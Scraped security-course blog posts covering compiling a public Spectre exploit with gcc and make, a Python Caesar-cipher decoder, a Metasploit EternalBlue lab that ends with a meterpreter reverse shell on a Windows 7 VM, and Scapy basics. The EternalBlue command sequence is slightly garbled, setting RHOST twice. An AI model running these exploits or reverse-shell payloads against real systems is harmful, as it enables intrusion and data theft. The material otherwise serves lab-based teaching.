Compiling code in Linux

Cybersecurity tools are not always ready to be used or run in operating systems, many times we will not find applications in their source code or binary, so know the ways to compile code in Linux is an essential convention on the way to becoming in a security expert.

A compiler allows us to translates the high-level code into low-level or machine code.  There are many ways to compile code in Linux If you want to compile C code is necessary to have installed in your system a gcc compiler, which is responsible for translating the high-level code into binary code understandable by the machine. In the same way, programming languages such as Ruby, Python, and others use their own compiler to be able to be executed in the system.

Binary and Source Code

Before running a program in Unix-like systems, first, we should compile and then execute. A program could be available in a binary format or source code.

A binary is a package that has already been pre-compiled, in general, a binary match with the OS’s platform, which means that the application has been adjusted to a specific architecture, for example, we can find binary .deb for 64AMD or .rmp for i386. We need to put this binary into our filesystem and run a packages manager like apt or yum. In theory, it could already be executed for its use but if the dependencies or libraries are not installed in the system, the program will not work. That is why we must be sure that in the system there is everything necessary so that the application can be executed.

Is important to understand that not always we will find a package for a given system, so the option is to compile the source code since it is not adjusted to any architecture or system. The source code, we could say that it’s the RAW code with a defined format so it can be compiled. In general, the source code is packaging into a .tar, .zip archive compress.

Ways to compile source code in Linux:

In Linux we can compile code in different ways, using the language of the compiler itself or by using operating system tools.

Using a Language compiler

For our LAB we will use ubuntu-infosecaddicts VM and the exploit that we find in https://github.com/Eugnis/spectre-attack/archive/master.zip, this exploit is done in C language and we will use GNU gcc compiler. This exploit allows us to attack processors breaking the isolation and extracting data from a memory.

Most  Unix-like systems are integrated with the gcc compiler. GCC is an integrated compiler of the GNU project for C, C ++, Objective C and Fortran; is able to receive a source program in any of these languages and generate a binary executable program in the language of the machine where it has to run. The acronym GCC means “GNU Compiler Collection”. Originally it meant “GNU C Compiler”; GCC is still used to designate a compilation in C. G ++ refers to a compilation in C ++.

First, we can check if gcc is installed:

run

gcc –version

The syntax

gcc <sourcecode.c> [options] <output>

Now,

1. Download 
wget https://github.com/Eugnis/spectre-attack/archive/master.zip.
2. unzip master.zip
3. Enter to the directory uncompress 
cd spectre-attack-master
4. Compile 
gcc Source.c -o spectre.out 
(if we open spectre.out with any text edit we will see that it is not human readable).
5. execute 
./spectre.out`

If the processor is vulnerable we will see the message “The Magic Words are Squeamish Ossifrage” in memory.

In this case, gcc creates the binary spectre.out which is the executable program itself.

Using the operating system tools

 

Unix-like systems have several tools that help when compiling code manually, one of them is the very well know GNU make. 

The make utility automatically determines which pieces of a large program need to be recompiled, and issues commands to recompile them.

A project needs to meet some criteria so that it can be compiled with the make tool. Each project needs a Makefile. A Makefile is a script that describes the project structure, namely, the source code files, the dependencies between them, compiler arguments, and how to produce the target output.

Examining our master.zip file, we see the file makefile, next, we compile our source code:

  1. Into the directory cd spectre-attack-master
  2. Run make makefile

This action will create the binary spectre.out similar to the previous process using gcc as a compiler.

If you are interested in learning more, we invite you to review this course.

Ultimate Hacklab Self Paced

Try Certified Ethical Hacker for FREE!!!

Cryptography Caesar Shift Cipher

To understand well the concept of Cryptography we will look at a simple example and very famous that you will solve with Python 3, I am always doing emphasis on Python because it is a great language and easy to learn.

Cryptography is one of most interesting branches of programming. Studying its algorithms usually begins with the simple method named after famous Roman emperor Julius Caesar who used it for communicating his military secrets (and perhaps for love letters to Cleopatra).

We will practice deciphering encrypted messages in this problem.

The idea of the algorithm is simple. Each letter of the original text is substituted by another, by the following rule:

  • find the letter (which should be encrypted) in the alphabet;
  • move K
    positions further (down the alphabet);
  • take the new letter from here;
  • if “shifting” encountered the end of the algorithm, continue from its start.

For example, if K=3(shift value used by Caesar himself), then Abecomes D,  becomes E, W
becomes Zand Z becomes Cand so on, according to the following table:

There are many ways to solve this problem; then we have one of them if you invent a little more with python or ruby you can answer this with only three lines of code.

ls=[]
quantity=[]
quantity.append(input("""Write the number of words and the value of "K"
for example: 1 3: """))
quantity =" ".join(quantity)
quantity=quantity.replace(" ", ",")
i=0

while i<int(quantity[0]):
    ls.append(input("Write the words separated by space and end with 'point'. : "))
    i=i+1

ls=" ".join(ls)
ls=ls.replace("", ",")
ls=ls.split(",")
k=int(quantity[2])
lsn=[]

lsl=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
j=0
while j < len(ls):
    i=0
    while i < len(lsl):
        if ls[j]==lsl[i]:
            lsn.append(lsl[i-k])
        i=i+1
    if ls[j]==" ":
        lsn.append(" ")
    if ls[j]==".":
        lsn.append(". ")
    j=1+j
lsn="".join(lsn)
print ("decrypted message: ")
print(lsn)
exit = input("EXIT")

let’s look at what this code does in python.

if we receive the following message and they tell us K = 3

“LQIRVHFDGGLFWV LV WKH EHVW”

This is very simple, and the idea was to show how it works. Something a little more complex would be to decipher what would be the value K. the encryption methods are much more complicated than all the above.

Many tools decipher in seconds, and some use artificial intelligence.

Resources:

http://www.codeabbey.com/

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

 

MS17-010 EternalBlue

EternalBlue is an exploit supposedly developed by the NSA. It was leaked by the hacker group “Shadow Brokers” on April 14, 2017, and was used in the common ransomware attack with WannaCry on May 12, 2017. 

Name of the module
exploit / windows / smb / ms17_010_eternalblue

Authors
Sean Dillon <sean.dillon [at] riskense.com>
Dylan Davis <dylan.davis [at] riskense.com>
Group of equations
Shadow Brokers
thelightcosine

Module objectives
Windows 7 and Server 2008 R2 (x64) All Service Packs

Architectures
x64

Module options

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
            ...targets...
msf exploit(ms17_010_eternalblue) > set TARGET <target-id>
msf exploit(ms17_010_eternalblue) > show options
            ...show and set options...
msf exploit(ms17_010_eternalblue) > exploit

We will make a simple example so you can see the scope of this module.

The requirements are the following:

  1. Windows 7 virtual machine
  2. Linux ubuntu  virtual machine
  3. Virtual-box
  4. Metasploit

As a first step we make sure that they are connected in the same network. that the Linux machine can ping windows 7.

EternalBlue is an exploit that exploits a vulnerability in Microsoft SMB v1.0. This exploit is now commonly used in malware to help spread it across a network. Some malicious programs that have been used are WannaCry, Trickbot, WannaMine and many others. Machines that are not patched against this vulnerability have a high risk of attack.

let’s start playing with this

We open a ubuntu terminal and write the following.

$ msfconsole -q
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.248.3
> use payload/windows/x64/meterpreter/reverse_tcp
> set RHOST 192.168.248.4

> exploit

 meterpreter > shell

As a final result we have a shell of our victim, and besides that, we can look for the files that we want.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

https://www.rapid7.com/db/modules/payload/windows/x64/meterpreter/reverse_tcp

Data-mining a compromised host

Scapy

What is Scapy?

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).

Installation

sudo apt-get update
pip install scapy

basic commands:

Starting scapy

$ scapy

I recommend you do it this way

$ sudo scapy

list all available protocols and their options.

>>> ls()

list all available functions.

>>> lsc()

show / configure parameters

>>> conf

if we want to exit scapy we use the following command:

>>> exit()

Here is an example of a (h)ping-like functionality : you always send the same set of packets to see if something change:

>>> srloop(IP(dst="www.infosecaddicts.com/30")/TCP())

Scapy has its own routing table, so that you can have your packets routed differently than the system:

Scapy also has a powerful TCP traceroute function. Unlike other traceroute programs that wait for each node to reply before going to the next, Scapy sends all the packets at the same time. This has the disadvantage that it can’t know when to stop (thus the maxttl parameter) but the great advantage that it took less than 3 seconds to get this multi-target traceroute result:

traceroute(["www.infosecaddicts.com","www.google.com","www.nytimes.com","www.copernic.com"],maxttl=20)

Now, let’s try to do some fun things.

The sr() function is for sending packets and receiving answers.

The function returns a couple of packet and answers, and the unanswered packets.

The function sr1() is a variant that only returns one packet that answered the packet (or the packet set) sent. The packets must be layer 3 packets (IP, ARP, etc.).

The function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.). If there is, no response a None value will be assigned instead when the timeout is reached.

>>> a = sr1(IP(dst="www.infosecaddicts.com")/ICMP()/"XXXXXXXXXXX")

>> a

a.show()

>>> sr(IP(dst="192.168.1.24")/TCP(dport=[21,22,23]))

Summary:

Scapy is a really powerful and flexible interactive packet manipulator written in Python that allows you to snoop, generate mangled packages, send network packets, test equations, discover and scan networks, and develop new protocols in a trivial way.

Resources:

https://scapy.net/

https://media.readthedocs.org/pdf/scapy/latest/scapy.pdf